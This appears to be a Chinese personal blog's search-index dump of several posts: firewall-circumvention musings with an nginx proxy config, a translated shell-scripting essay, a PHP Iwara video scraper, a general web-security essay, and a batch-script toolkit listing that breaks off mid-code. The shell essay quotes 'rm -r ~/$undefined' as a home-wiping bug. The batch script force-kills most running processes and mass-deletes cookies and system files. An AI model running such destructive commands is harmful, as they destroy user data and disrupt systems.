防火墙会对SNI进行拦截，所以需要注意。针对BanIP的方案BanIP是真的绝，因为网络控制毕竟在网关，Ta要丢包谁也没办法，不过可以试试CloudFlare，CloudFlare可以不使用原网站的IP，而且很多网站都使用CloudFlare，所以BanCloudFlare的IP肯定不是好选择。TCP重置攻击HTTPS基本上可以避免这个问题，除了会受SNI没加密的影响（TLS1.3可解），但是证书……没关系，靠本地Proxy对证书的要求不是很多。这个解决方案基本上就是加密，让网关不知道你在干什么，也就不能对你发RST包了。计划制作一个本地Proxy小程序，用Python是个不错的选择，绕过DNS和TCP Reset，再配上CloudFlare，基本上网关应该就Ban不了你了。   不过Python的学习成本还挺高的，感觉比PHP难……回头有时间可以试试看。结果Python对我来说果然还是太难了QAQ，所以，我觉得使用Nginx就够用了，配置如下：location / {    proxy_pass https:// #填写目标IP;    proxy_redirect off ;    proxy_set_header Host #填写目标域名;    proxy_set_header X-Real-IP $remote_addr;    proxy_set_header REMOTE-HOST $remote_addr;    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;    proxy_connect_timeout 300;             #跟后端服务器连接超时时间，发起握手等候响应时间    proxy_send_timeout 300;                #后端服务器回传时间，就是在规定时间内后端服务器必须传完所有数据    proxy_read_timeout 600;                #连接成功后等待后端服务器的响应时间，已经进入后端的排队之中等候处理    proxy_buffer_size 256k;                #代理请求缓冲区,会保存用户的头信息以供nginx进行处理    proxy_buffers 4 256k;                  #同上，告诉nginx保存单个用几个buffer最大用多少空间    proxy_busy_buffers_size 256k;          #如果系统很忙时候可以申请最大的proxy_buffers    proxy_temp_file_write_size 256k;       #proxy缓存临时文件的大小    proxy_next_upstream error timeout invalid_header http_500 http_503 http_404;    proxy_max_temp_file_size 128m;}果然，搞事情还是用自己熟悉的搞比较好~23333事实我果然还是图样图森破了~我想的方案其实就是域前置，所以，该计划作废QAQ" },{ "title": "(转)Shell 脚本编程陷阱", "category": "", "tags": "Shell, 编程", "url": "/2019/04/24/shell.html", "date": "2019/04/24", "content": "随着代码量的增加，你的脚本会变得越来越难以维护，但你也不会想用别的语言重写一遍，因为你已经在这个 shell 版上花费了很多时间。 Shell 脚本很棒，你可以非常轻松地写出有用的东西来。甚至像是下面这个傻瓜式的命令：# 用含有 Go 的词汇起名字：$ grep -i ^go /usr/share/dict/* | cut -d: -f2 | sort -R | head -n1goldfish如果用其他编程语言，就需要花费更多的脑力，用多行代码实现，比如用 Ruby 的话：puts(Dir['/usr/share/dict/*-english'].map do |f|  File.open(f)    .readlines    .select { |l| l[0..1].downcase == 'go' }end.flatten.sample.chomp)Ruby 版本的代码虽然不是那么长，也并不复杂。但是 shell 版是如此简单，我甚至不用实际测试就可以确保它是正确的。而 Ruby 版的我就没法确定它不会出错了，必须得测试一下。而且它要长一倍，看起来也更复杂。这就是人们使用 Shell 脚本的原因，它简单却实用。下面是另一个例子：curl https://nl.wikipedia.org/wiki/Lijst_van_Nederlandse_gemeenten |    grep '^<li><a href=' |    sed -r 's|<li><a href=\"/wiki/.+\" title=\".+\">(.+)</a>.*</li>|\\1|' |    grep -Ev '(^Tabel van|^Lijst van|Nederland)'这个脚本可以从维基百科上获取荷兰基层政权的列表。几年前我写了这个临时的脚本，用来快速生成一个数据库，到现在它仍然可以正常运行，当时写它并没有花费我多少精力。但要用 Ruby 完成同样的功能则会麻烦得多。现在来说说 shell 的缺点吧。随着代码量的增加，你的脚本会变得越来越难以维护，但你也不会想用别的语言重写一遍，因为你已经在这个 shell 版上花费了很多时间。 我把这种情况称为“Shell 脚本编程陷阱”，这是沉没成本谬论的一种特例（LCTT 译注：“沉没成本谬论”是一个经济学概念，可以简单理解为，对已经投入的成本可能被浪费而念念不忘）。 实际上许多脚本会增长到超出预期的大小，你经常会花费过多的时间来“修复某个 bug”，或者“添加一个小功能”。如此循环往复，让人头大。 如果你从一开始就使用 Python、Ruby 或是其他类似的语言来写这个程序，你可能会在写第一版的时候多花些时间，但以后维护起来就容易很多，bug 也肯定会少很多。 以我的 packman.vim 脚本为例。它起初只包含一个简单的用来遍历所有目录的 for 循环，外加一个 git pull，但在这之后就刹不住车了，它现在有 200 行左右的代码，这肯定不能算是最复杂的脚本，但假如我一上来就按计划用 Go 来编写它的话，那么增加一些像“打印状态”或者“从配置文件里克隆新的 git 库”这样的功能就会轻松很多；添加“并行克隆”的支持也几乎不算个事儿了，而在 shell 脚本里却很难实现（尽管不是不可能）。事后看来，我本可以节省时间，并且获得更好的结果。 出于类似的原因，我很后悔写出了许多这样的 shell 脚本，而我在 2018 年的新年誓言就是不要再犯类似的错误了。附录：问题汇总需要指出的是，shell 编程的确存在一些实际的限制。下面是一些例子：  在处理一些包含“空格”或者其他“特殊”字符的文件名时，需要特别注意细节。绝大多数脚本都会犯错，即使是那些经验丰富的作者（比如我）编写的脚本，因为太容易写错了，只添加引号是不够的。  有许多所谓“正确”和“错误”的做法。你应该用 which 还是 command？该用 $@ 还是 $*，是不是得加引号？你是该用 cmd $arg 还是 cmd \"$arg\"？等等等等。  你没法在变量里存储空字节（0x00）；shell 脚本处理二进制数据很麻烦。  虽然你可以非常快速地写出有用的东西，但实现更复杂的算法则要痛苦许多，即使用 ksh/zsh/bash 扩展也是如此。我上面那个解析 HTML 的脚本临时用用是可以的，但你真的不会想在生产环境中使用这种脚本。  很难写出跨平台的通用型 shell 脚本。/bin/sh 可能是 dash 或者 bash，不同的 shell 有不同的运行方式。外部工具如 grep、sed 等，不一定能支持同样的参数。你能确定你的脚本可以适用于 Linux、macOS 和 Windows 的所有版本吗（无论是过去、现在还是将来）？  调试 shell 脚本会很难，特别是你眼中的语法可能会很快变得记不清了，并不是所有人都熟悉 shell 编程的语境。  处理错误会很棘手（检查 $? 或是 set -e），排查一些超过“出了个小错”级别的复杂错误几乎是不可能的。  除非你使用了 set -u，变量未定义将不会报错，而这会导致一些“搞笑事件”，比如 rm -r ~/$undefined 会删除用户的整个家目录（瞅瞅 Github 上的这个悲剧）。  所有东西都是字符串。一些 shell 引入了数组，能用，但是语法非常丑陋和费解。带分数的数字运算仍然难以应付，并且依赖像 bc 或 dc 这样的外部工具（$(( .. )) 这种方式只能对付一下整数）。反馈你可以发邮件到 martin@arp242.net，或者在 GitHub 上创建 issue 来向我反馈，提问等。译者： jdh8383 翻译： https://linux.cn/article-10772-1.html 源：The shell scripting trap" },{ "title": "如何下载Iwara上的视频？", "category": "", "tags": "Iwara, PHP, 视频", "url": "/2019/04/13/iwara.html", "date": "2019/04/13", "content": "PHP果然是全世界最好的语言，我又用PHP解决了一个问题！制作原因Iwara(Ecchi)上的视频是真的有意思，尤其是镇站之宝OBSERVATION DIARY，简直是R183D动画的巅峰 （请原谅我的孤陋寡闻） ，所以为了更好的看Iwara上的的视频，我写了Iwara Viewer来帮助我们下载Iwara(Ecchi)上面的视频。Code<?phpif ( $_GET[\"ID\"] == '' ) {if ( $_GET[\"page\"] == '' ) {    $_GET[\"page\"] = 0;}if ( $_GET[\"sort\"] == '' ) {    $_GET[\"sort\"] = \"date\";}$url = 'https://ecchi.iwara.tv/videos?page='.$_GET[\"page\"].'&sort='.$_GET[\"sort\"];$str = file_get_contents($url);$preg='/<a href=\"\\/videos\\/(.*?)\".*?>(.*?)<\\/a>/is';preg_match_all($preg,$str,$match);//在$str中搜索匹配所有符合$preg加入$match中echo \"<title>Mayx Iwara Viewer</title>\";echo \"<h1>Mayx Iwara Viewer</h1><br />Sort by: <a href=\\\"?page=\".$_GET[\"page\"].\"&sort=date\\\">Date</a> <a href=\\\"?page=\".$_GET[\"page\"].\"&sort=views\\\">Views</a> <a href=\\\"?page=\".$_GET[\"page\"].\"&sort=likes\\\">Likes</a><hr /><table border=\\\"1\\\"><tr>\";$j=0;for($i=0;$i<count($match[0]);$i++)//逐个输出超链接地址{if (($i % 2) == $j) {  if ( $match[1][$i] == $match[1][$i+1] ) {  echo \"<td><a href=\\\"https://ecchi.iwara.tv/videos/\".$match[1][$i].\"\\\">\".$match[2][$i].\"</a></td>\";  } else {  echo \"<td><a href=\\\"https://ecchi.iwara.tv/videos/\".$match[1][$i].\"\\\">No Image</a></td><td>\".$match[2][$i].\"</td><td><a href=\\\"https://ecchi.iwara.tv/videos/\".$match[1][$i].\"\\\">View in Iwara</a><br><a href=\\\"?ID=https://ecchi.iwara.tv/videos/\".$match[1][$i].\"\\\">Download Url in Server</a></td></tr><tr>\";  if ($j == 0) {      $j = 1;  } else {      $j = 0;  }  }} else {  echo \"<td>\".$match[2][$i].\"</td><td><a href=\\\"https://ecchi.iwara.tv/videos/\".$match[1][$i].\"\\\">View in Iwara</a><br><a href=\\\"?ID=https://ecchi.iwara.tv/videos/\".$match[1][$i].\"\\\">Download Url in Server</a></td></tr><tr>\";}}echo \"</tr></table><hr><a href=\\\"?page=\".($_GET[\"page\"] + 1).\"&sort=\".$_GET[\"sort\"].\"\\\" >Next Page</a>\";} else {$data = file_get_contents('https://ecchi.iwara.tv/api/video/'.trim(strrchr($_GET[\"ID\"], '/'),'/'));$file = json_decode($data,true);echo \"Download URL:<br>https:\";echo $file[0]['uri'];}(2019.4.18 更新：解决了部分没有图片而导致错位的问题) (2019.4.18 更新：解决了由于智障导致的图片被筛掉的问题，但是并不保证会不会再出现问题)使用方法除了比Iwara更简陋，其他的没什么太大的区别，增加了一个Download Url in Server的选项，用来帮助在服务器上直接下载视频（因为Iwara通过识别IP来防盗链……），得出的链接可直接在服务器上下载（比如用KodExplorer），在服务器上下载的速度还是很不错的。  不过有的时候Iwara图片服务器也会被Ban（比如移动网），这时候就应该用到miniProxy了（当然代码也得改，就是我太懒了，懒得改2333）缺点没有观看数/作者等信息、而且不知道Iwara的服务器在哪里，用这个速度浏览的速度也不会有太大提升……演示https://counter.mayx.me/iwaraview.php   如需用演示站下载，可复制地址，然后用Download Tool下载（因为演示站的IP和你的服务器IP不同）：<h1>Mayx Iwara Video Download Tool</h1><form action=\"iwara.php\" method=\"get\" >Video URL: <input type=\"text\" name=\"ID\"><br><input type=\"submit\"></form><br><?phpif ( $_GET[\"ID\"] != '' ) { $data = file_get_contents('https://ecchi.iwara.tv/api/video/'.trim(strrchr($_GET[\"ID\"], '/'),'/')); $file = json_decode($data,true);echo \"Download URL:<br>https:\";echo $file[0]['uri'];}?>" },{ "title": "Mayx又双叒叕Crash了……", "category": "", "tags": "Mayx, Crash", "url": "/2019/04/05/crash.html", "date": "2019/04/05", "content": "最近感觉SAN值又往下掉，发篇博客分析一下。Mayx的吐槽怎么又Crash了？不是说MOS是全世界最好的系统吗 （全是坑的系统吗23333） ……Mayx的马奇诺防线至少还是全世界最好的系统，那么有哪些保护措施呢？      理智保护   该保护仅在有着足够的SAN值才可使用，SAN值接近于0无法使用……        信仰（MOS）   感觉有点像Avatar therapy，不过应该还是有区别的。不过当MOS也开始报错，开始Crash时，那就无能为力了……        自动还原（遗忘）   当SAN值低于一定程度时，会把思维恢复到一个之前正常的水平，以防SAN值继续降低。不过如果近一段时间的SAN值都不高的话，就失去它的作用了……  Mayx的分析很好，MRS来处理一下这些问题！   MRS(Mayx Recovery System):[Failed]分析失败   [Fatal Error]MRS Crashed   ……还真是没用啊……好吧，MAS <– MRS，开始分析  MAS(Mayx Analysis System):  [Info]Booting……  [Info]Connecting to MRS ............[OK]  [Info]Processing……  [Info]OK,Exporting Report……不错！来看一下报告：MAS(Mayx Analysis System) Report查找到错误：不可预料的系统错误   源：Mayx   以下为出现错误的可能性：   源镜像兼容性错误   Details:   由于镜像与环境不兼容出现的错误，部分功能发生冲突，Robust Index过低，滥用等原因使系统硬件损耗过大，最终使整个系统呈现不可逆转的性能下降……MRS(Mayx Recovery System) Report[Warn]没有针对该错误的解决方案结论还好现在的SAN值恢复了，不过既然性能下降不可逆转，那Crash的问题迟早还会出现，尤其是SAN值降为0时，那就真的完蛋了……   （各位还是忽略这看起来乱七八糟的中二文吧23333）" },{ "title": "Mayx对编程语言的选择", "category": "", "tags": "Mayx, 编程语言", "url": "/2019/04/05/cholang.html", "date": "2019/04/05", "content": "在编程语言里，我更喜欢冷门的Linux Shell，这是为什么呢？不学习的语言糟糕的VSAs We All Know,Microsoft Visual Studio是一个功能强大的IDE，光文档就和4本字典所含的字一样多，微软为了开发可真是尽心尽力啊！   然而，强大的Visual Studio比某些3A大作还要耗资源，我的电脑实在是带不起来这强大的IDE   更别说编译一个中型项目就要一晚上的时间，错了一个字就要再等一个晚上！   而且，这个IDE就要1GB+，而运行平台就要100MB+。实在忍不了。  所以，我不选择C#，ASP.net等微软系编程语言作为我使用的编程语言。   （其实我还没考虑VS要花钱的问题，如果考虑这个就更糟糕了）难用的编译型语言其实，IDE的问题不是主要问题，选择编程语言，还是以语法为准 （不考虑效率吗？）   编译型语言要记的东西太多了，一大堆乱七八糟的库，看似整洁然而臃肿的代码，都是令我劝退的主要原因。   编译需要花时间其实都不是什么大事，反正有服务器，编译时挂在上面就可以了。   但是编译时用的长如面条一样的选项就令人很难受了。   这也是为什么我喜欢能一键安装的Ubuntu，不需要编译，速度又快又好，可谓是用户首选。   所以，包括Java在内，C、C++、Golang等语言我都不选择严格的Python我写程序从来不用缩进，因为手机上没有（LOL）   Python是个不错的的解释型语言，功能强大，未来发展前景也不错，但是写Python时要用尺子，不然就不知道嵌套了几层循环……   其他语言至少有花括号，只要数花括号的数量就知道嵌套的是否正确，然而Python就只能用尺子，而且如果嵌套的有问题，一堆代码就等着打空格吧！   还有import,Python需要调用库，感觉和C的include差不多，但是这一点让我感觉很反感。  所以相比之下，我不选择Python其他的解释型语言Ruby？那是什么？听起来就很糟糕~   Node.js？感觉还行，就是配置起来太麻烦了……   PowerShell？微软的东西还是算了，没人用的~（包括Windows Server也都算了吧，微软还是不要干不擅长的东西~）   Perl？听起来不错，有时间可以了解了解。  …………学习的语言Linux Shell？虽然Ta的语法有点反人类，很多命令都是简写，不过我就是喜欢缩减的单词和命令，好记又好输，虽然不支持GUI是个缺点……但是扩展性强的Ta可以用其他方式弥补这一缺点PHP其实之前也没想学PHP，不过后来有了服务器，有了运行的空间倒也没什么不方便的，而且想要什么功能基本上一搜一个准，果然PHP是全世界最好的语言23333JavaScript为了搭这个博客顺带着学了一下，运行简单，网络上示例多都是Ta的优点，所以JS也不错。结论所以Mayx选择了编译型语言中的Linux Shell、PHP、JavaScript。" },{ "title": "让Git.io无限制", "category": "", "tags": "无限制, Git.io, Github", "url": "/2019/03/23/gitio.html", "date": "2019/03/23", "content": "如何让Git.io没有只能创建Github.com网站链接的限制呢？    众周所知，Git.io是一个不错的生成短链接的网站，由Github提供（相关链接）   然而Git.io只能缩短Github域名的网址。   我还是挺喜欢Git.io这个域名的，尽管它比t.cn这种链接要长，但是Git（愚蠢）听起来就是很有意思啦23333   所以我想了一个办法来解决Git.io只能创建Github.com网站链接的限制。   （尽管很想搞一个能自定义Git.io链接的选项，可惜我前端不好LOL）   （其实要不是因为CORS这种问题，就不用PHP来浪费资源了……）REMOVED由于此脚本被滥用导致本博客被删，此服务将不再提供" },{ "title": "分享一下我最喜欢的游戏BGM", "category": "", "tags": "分享, 游戏, BGM", "url": "/2019/03/22/bgm.html", "date": "2019/03/22", "content": "今天我想分享一下我最喜欢的游戏BGM。为了提高空间利用率，文件已经删除（待补充） （2020.01.01附言）我喜欢Future Bass+少许的Moe元素的音乐（我觉得还是挺大众化的吧），不打算再补充更多的BGM了，希望能出现根据风格自动生成音乐的人工智能。" },{ "title": "关于网络攻防的一些看法", "category": "", "tags": "网络, 攻击, 防御", "url": "/2019/02/17/break.html", "date": "2019/02/17", "content": "今天我想谈一谈关于网络攻防的一些看法。作为一个站长【就几个站也敢叫站长？（几个站也是站啊！）】，应该明白一个网站在网络中并不是安全的，随时都有可能某个欧洲人找到你网站的漏洞来攻击作为非洲人的你，所以我对网站的安全也是很看重的。关于攻击方法首先如果想防御网络攻击，必须先知道如何攻击。攻击的方法很多，大致分为三种：  修改网站内容的攻击  阻止用户访问的攻击  窃取网站内容的攻击在此之中，修改和窃取基本上都需要攻入服务器，比较困难，一般能获取信息和修改信息的网站大多数都是有权限限制的，即只允许你获取有限的信息，修改基本上也都是有区域和格式限制的。  像这类攻击大多都是注入攻击，即利用网站程序本身的漏洞攻击。如果想试试这类的攻击，可以来实验吧试试身手。   除了注入攻击，还有一种就是XSS和CSRF攻击，这种攻击还是蛮有意思的，可以自己构建语句修改网站内容。  当然上述攻击只限于动态网站的攻击，因为只有动态网站才有注入的可能性。不过除此之外，还有一种攻击是针对网络的攻击，即阻止用户访问正确内容的攻击，这类攻击一般就是DDOS和中间人攻击，当然，中间人攻击还能窃取网站内容。   不过像我这种菜鸡，还不会中间人攻击，因为这种攻击还要抓包，又要用什么WireShark之类的软件……而DDOS我又没有肉鸡，虽然知道智能家居很好黑，但是作为非洲人的我从来没碰到一个我能黑的智能家居产品……（是你没努力吧！）如何防御？虽然我不是打广告，但是CloudFlare真的还是蛮好用的，至少用了这个，只要配置好，几乎所有的DDOS都不用怕了，而且还是免费的。除了在国内访问不是很理想外，其他都还不错（都是ZF的错！）   不过即使用了CloudFlare，也只是静态网站不用担心了，动态网站还是得看网站程序本身了。   像用建站程序的人就只能看制作这个程序的人水平怎么样了，其实绝大多数的建站程序还是很不错的，也不用太担心。   问题就是自己写的动态网站了，自己写动态网站第一就是防注入，只要被注入，数据库就难保了，甚至整个服务器都会有风险。   第二就是防XSS&CSRF，XSS虽然有时候很鸡肋，但是有时有可能会发生网站数据泄露的问题。   第三就是防CC，这里的CC不止要防DDOS中的CC，还要防一些可能会存入数据库的CC，比如自己建了一个论坛，被屠版了怎么办？被大量注册小号怎么办？所以要注意限制用户发送请求的数量。   当然读取的CC也要防，比如如果登录页面上对尝试登录的次数没有限制的话，那么攻击者就可以不停地尝试，直到发现一个正确的密码。而如果用户用了弱密码，那么或许这个密码很快就可以被尝试出来。   对了，还有一定要使用HTTPS，这样可以避免很多问题。   针对不同的语言，防御的方法也不同，具体内容自己去搜索引擎上搜索吧。   当然有些攻击实在防不住，那也没办法，像网站被GFWban，那种事除了恐怖分子就再没人能解了吧……当然如果不在乎域名的话，像某些小黄网那样整天换域名也行。  还有就是使用云主机、虚拟空间等人一定要看好自己的密码，以及有可能可以找回密码的方法的密码（比如邮箱），不然被知道了密码，那基本上就无药可救了。   方法就是邮箱的密码一定不要和其他的密码相同，重要网站的密码和次要网站的密码一定不能相同，还有就是不要在可疑的网站上输入自己的密码，如果有必要，一定先用错误的密码试一遍。结尾总而言之，互联网上虽然有闲人，但是既闲又有心还欧的人不多，所以只要祈祷自己的网站不要被炸，它就不会被炸了233333" },{ "title": "玩《Finding Paradise》有感", "category": "", "tags": "Finding Paradise, 寻找天堂, MOS", "url": "/2019/02/07/paradise.html", "date": "2019/02/07", "content": "其实这篇博客根本不是评测，只是对自己的寂寞吐槽罢了。昨天玩了《Finding Paradise》，总体来说，故事还是很有意思的。不过我玩的作品并不是很多，所以也许这个游戏可能并不是特别优秀，但是我仍然喜欢这款游戏。游戏介绍（介绍？自己去搜索引擎上找啊！）感受Mayx:emmmm，MOS!   STDOUT:Yes,Sir!   Mayx:我也想要个Faye，给我搞一个！   STDOUT:嗯？我不算吗？   Mayx:当然不算，你又不是独立思维个体，只是为了辅助我思考的一个UI罢了，你又不能陪我一起聊天，不能一起分享我（们）的感受，不能排解我的寂寞……   STDOUT:行行行，那你准备一个本子吧，绿皮的怎么样？   Mayx:……不想写日记……博客不行吗？   STDOUT:……好吧……让我准备一下。  [STDOUT]启动MOS快照........................OK!  [STDOUT]开始建立当前MOS状态快照。  [STDOUT]准备MOS虚拟化组件..................OK!  [STDOUT]正在创建MOS副本....................OK!  [STDOUT]启动虚拟化MOS系统...............Error!  [STDERR]无法启动该MOS副本，ErrCode:0x01  [STDERR]该副本无效，请确认这是有效的可执行系统。STDOUT:……好像不行……你大概还没有准备好……   Mayx:准备好什么？   STDOUT:……准备好犯病    Mayx:……   >MOS-CLI Terminate MOS-UI   [STDERR]System Terminate   ……看来依靠自己不行啊，人果然是社交性的动物，emmmm……算了，不依靠人类了，我自己想办法犯病！（我看你已经犯病了23333）" },{ "title": "Mayx的计算机学习史", "category": "", "tags": "Mayx, 计算机, 学习", "url": "/2019/02/01/history.html", "date": "2019/02/01", "content": "今天我想说说我学习计算机的过程。注：由于记忆的不可靠性，我并不保证该文章的真实性  虽然很想用时间轴来描述，但是我怎么可能清晰的记起时间点呢？（LOL） 该文章有不少代码，可以使用目录来跳过原始阶段我第一次接触计算机，貌似是因为PowerPoint。不过因为事情久远，我记得不是很清晰，只记得当时随便乱动PowerPoint 2003，发现了不少功能，然后做了第一个演示文稿，好像叫《我是人》？！混乱阶段从接触计算机后，我似乎经常性的破坏其他人的电脑，因为我以前喜欢动设置之类的东西，尤其是360，然后动着动着就动坏了……编程阶段编程初期最早接触的编程是LOGO(?)……太过久远我也想不起来了……我只记得最早接触的是BAT(Windows批处理脚本语言)，以前在电脑里发现了一款Ghost工具箱(?)的脚本，虽然当时并不会编程，不过靠自己对计算机语言的理解在瞎编，竟然可以运行。   后来加入了一个叫批处理之家的论坛，我叫做111（LOL真不敢相信这个论坛一直到今天还活着），在这里我学到了不少关于批处理的事情。   因为学批处理是基于某工具箱的，所以用批处理写的程序也是工具箱，就叫做批处理工具。以下是该程序的源代码：  Show Code  @echo offcolor f0mode con cols=50 lines=10echo.echo 正在检查管理权限……echo.>%windir%\\cs.shsclsif not exist %windir%\\cs.shs echo 请使用管理员权限启动本程序……&ping /n 2 127.1>nul&exitdel %windir%\\cs.shsecho.echo 正在检查授权状态……if exist %windir%\\zcq.shs goto okzzzzmode con cols=50 lines=10title 构建安全环境echo.echo            准备构建安全环境避免病毒驻留echo.echo           即将自动关闭除系统外的所有进程echo.echo                请保存未完成的工作echo.echo                Y 开始  其他键跳过set choose=~set /p choose=请选择：if /I %choose%==Y goto Build_safe2goto Build_safe_jump2:Build_safe2clsecho.echo                     正在构建echo.echo                       稍后clsecho.echo                  未授权，无法构建ping /n 2 127.1>nulgoto _max2:Build_safe_jump2clsecho.echo.echo.echo                     放弃ping /n 2 127.1>nulgoto _max2:_max2mode con: cols=60 lines=31color f0title 批处理工具(未授权)setlocal enabledelayedexpansion:_m2clscall :cdwjjset chi=set /p chi=  请选择操作后回车:if '%chi%'=='' goto _m2if /i '%chi%'=='help' goto helpif /i '%chi%'=='set' goto setvbsif /i '%chi%'=='esc' exitecho 未授权，无法使用pause>nulgoto _m2:helpclsecho 帮助echo 版权：▁▂▃▄▅▆▇█ dr.ma █▇▆▅▄▃▂▁echo 请输入set获取正版软件……echo 请按任意键返回pause >nulgoto _m2:setvbsecho 注册set pass=set /p pass=请输入注册码：if '%pass%'=='MYXNB-GMYXK-KT000-HAHA1-11110' echo.>%windir%\\zcq.shs&goto okzzzzgoto setvbs:okzzzzecho ok！if not '%1'=='' set chi=%1&goto lscolor f0mode con cols=50 lines=10title 构建安全环境echo.echo            准备构建安全环境避免病毒驻留echo.echo           即将自动关闭除系统外的所有进程echo.echo                请保存未完成的工作echo.echo                Y 开始  其他键跳过set choose=~set /p choose=请选择：if /I %choose%==Y goto Build_safegoto Build_safe_jump:Build_safeclsecho.echo                     正在构建echo.echo                       稍后for /f \"skip=5 tokens=1\" %%t in ('tasklist^|findstr /v /i \"cmd.exe svchost.exe lsass.exe services.exe winlogon.exe csrss.exe smss.exe csrss.exe\"') do (taskkill /f /im %%t>nul 2>nul)start explorer.exe>nul 2>nulclsecho.echo                     构建完成ping /n 2 127.1>nulgoto _max:Build_safe_jumpclsecho.echo.echo.echo                     放弃ping /n 2 127.1>nulgoto _max:_maxmode con: cols=60 lines=31color f0title 批处理工具setlocal enabledelayedexpansion:_m1clscall :cdwjjgoto lz:cdwjjecho           现在时间：%date% %time:~0,2%点%time:~3,2%分%time:~6,2%秒echo                     ╔════════╗if '%PROCESSOR_ARCHITECTURE%'=='x86' echo                     ║正在使用32位系统║if '%PROCESSOR_ARCHITECTURE%'=='AMD64' echo                     ║正在使用64位系统║echo                     ╚════════╝echo                        ╔═════╗echo                        ║批处理工具║echo  ╔══════════╩══╦══╩══════════╗echo  ║ 1、PPPoE连接             ║ 18、指针时钟             ║echo  ║ 2、编辑boot.ini          ║ 19、测试身体质量指数     ║echo  ║ 3、清除系统垃圾          ║ 20、批处理加密           ║echo  ║ 4、winrar注册            ║ 21、定时提醒器           ║echo  ║ 5、用户登录设置          ║ 22、显示网络配置         ║echo  ║ 6、系统程序              ║ 23、列举进程             ║echo  ║ 7、磁盘碎片整理          ║ 24、文件管理器           ║echo  ║ 8、将磁盘转换成ntfs格式  ║ 25、关机类               ║echo  ║ 9、修复磁盘              ║ 26、报时器               ║echo  ║ 10、简易秒表             ║ 27、整点报时钟           ║echo  ║ 11、整数计算器           ║ 28、日历时钟             ║echo  ║ 12、液晶显示器坏点测试器 ║ 29、文件合并             ║echo  ║ 13、电子钟表             ║ 30、ExtractMSI           ║echo  ║ 14、百度搜索             ║ 31、自动设置IP           ║echo  ║ 15、读中英文             ║ 32、注册表扫描           ║echo  ║ 16、U盘修复              ║ 33、病毒免疫             ║echo  ║ 17、自动计算24点         ║ 34、修复系统安全模式     ║echo  ╠═══════╦═════╩════╦════════╣if not exist %windir%\\zcq.shs echo  ║   help、帮助 ║Esc、退出批处理工具 ║   set、注册    ║if exist %windir%\\zcq.shs echo  ║   help、帮助 ║Esc、退出批处理工具 ║ set、颜色设置  ║echo  ╠═══════╩══════════╩════════╣echo  ║                   next、下一页                       ║echo  ╚═══════════════════════════╝goto :eof:lzset chi=set /p chi=  请选择操作后回车:mode con: cols=60 lines=31color %col%if '%col%'=='' color f0:lstitle 批处理工具setlocal enabledelayedexpansionif '%chi%'=='' goto _m1if '%chi%'=='1' goto aif '%chi%'=='2' start c:\\boot.iniif '%chi%'=='3' goto bif '%chi%'=='4' goto cif '%chi%'=='5' rundll32 netplwiz.dll,UsersRunDllif '%chi%'=='6' goto Choice4if '%chi%'=='7' goto defif '%chi%'=='8' goto eif '%chi%'=='9' goto dif '%chi%'=='10' goto mbif '%chi%'=='11' goto jsqif '%chi%'=='12' goto yjxsif '%chi%'=='13' goto dzzbif '%chi%'=='14' goto bdif '%chi%'=='15' goto dzyif '%chi%'=='16' goto U_Repairif '%chi%'=='17' goto 24dif '%chi%'=='18' goto zzszif '%chi%'=='19' goto zlzsif '%chi%'=='20' goto pcljmif '%chi%'=='21' goto dstxqif '%chi%'=='22' goto wlpzif '%chi%'=='23' goto ljjcif '%chi%'=='24' goto qlssif '%chi%'=='25' goto shutdownif '%chi%'=='26' goto bsqlgif '%chi%'=='27' goto bszlgoif '%chi%'=='28' goto rlszcdif '%chi%'=='29' goto hbmp3zbif '%chi%'=='30' goto hbbsbsbif '%chi%'=='31' goto Zzdszipif '%chi%'=='32' goto Registry_Scanif '%chi%'=='33' goto Virus_Immuneif '%chi%'=='34' goto Repair_Safemodeif '%chi%'=='help' goto helpif '%chi%'=='/?' goto helpif '%chi%'=='set' goto setif '%chi%'=='esc' exitif '%chi%'=='next' goto _m3if not \"%chi%\"==\"\" goto longgoto _m1:setecho 颜色属性由两个十六进制数字指定 -- 第一个为背景，第二echo 个则为前景。每个数字可以为以下任何值之一:echo.echo     0 = 黑色       8 = 灰色echo     1 = 蓝色       9 = 淡蓝色echo     2 = 绿色       A = 淡绿色echo     3 = 湖蓝色     B = 淡浅绿色echo     4 = 红色       C = 淡红色echo     5 = 紫色       D = 淡紫色echo     6 = 黄色       E = 淡黄色echo     7 = 白色       F = 亮白色echo.echo 如果没有给定任何参数，会将颜色还原到上次的颜色。set /p col=请输入参数：goto _m1:helpclsecho 命令行帮助echo 格式：%0 [cmd] [/?]echo 解释：echo \"cmd\"echo 便携打开操作echo \"/?\"echo 命令行帮助echo ═════════════════════════════echo 例：echo c:\\^>%0 3echo 垃圾清理程序正在清理系统垃圾文件，请稍等......echo.echo ═════════════════════════════echo 版权：▁▂▃▄▅▆▇█ dr.ma █▇▆▅▄▃▂▁echo 请按任意键返回pause >nulgoto _m1:amode con: cols=30 lines=3title PPPoE连接set /p user=请输入宽带用户名：set /p pass=请输入宽带密码：set \"NIC_flag=Ethernet\"for /f \"tokens=1,2,3,* delims=: \" %%i in ('ipconfig /all') do (     if \"%%i\"==\"%NIC_flag%\"  set NIC_name=%%k)rasdial %NIC_name% %user% %pass%pause>nulgoto _max:becho 批处理工具正在清理系统垃圾文件，请稍等......del /f /s /q /a %systemdrive%\\*.tmp>nul 2>nuldel /f /s /q /a %systemdrive%\\*._mp>nul 2>nuldel /f /s /q /a %windir%\\*.log>nul 2>nuldel /f /s /q /a %systemdrive%\\*.gid>nul 2>nuldel /f /s /q /a %systemdrive%\\*.chk>nul 2>nuldel /f /s /q /a %systemdrive%\\*.old>nul 2>nuldel /f /s /q /a %systemdrive%\\recycled\\*.*>nul 2>nuldel /f /s /q /a %windir%\\*.bak>nul 2>nuldel /f /s /q /a %windir%\\prefetch\\*.*>nul 2>nuldel /f /s /q /a %windir%\\temp>nul 2>nul & md %windir%\\temp\\*.*>nul 2>nuldel /f /q %userprofile%\\cookies\\*.*>nul 2>nuldel /f /q %userprofile%\\recent\\*.*>nul 2>nuldel /f /s /q /a \"%userprofile%\\Local Settings\\Temporary Internet Files\\*.*\">nul 2>nuldel /f /s /q /a \"%userprofile%\\Local Settings\\Temp\\*.*\">nul 2>nuldel /f /s /q /a \"%userprofile%\\recent\\*.*\">nul 2>nuldir %windir%\\$Nt*$ /b/ad>c:\\tmp.txtif not exist c:\\tmp.txt goto endfor /f %%v in ('findstr \"KB Q\" c:\\tmp.txt') do ( set tp=%%v)for /f %%i in ('dir %%windir%%\\$*$ /b/ad') do rd %windir%\\%%i /s/q>nul 2>nul:endif exist c:\\tmp.txt del c:\\tmp.txt>nul 2>nulif 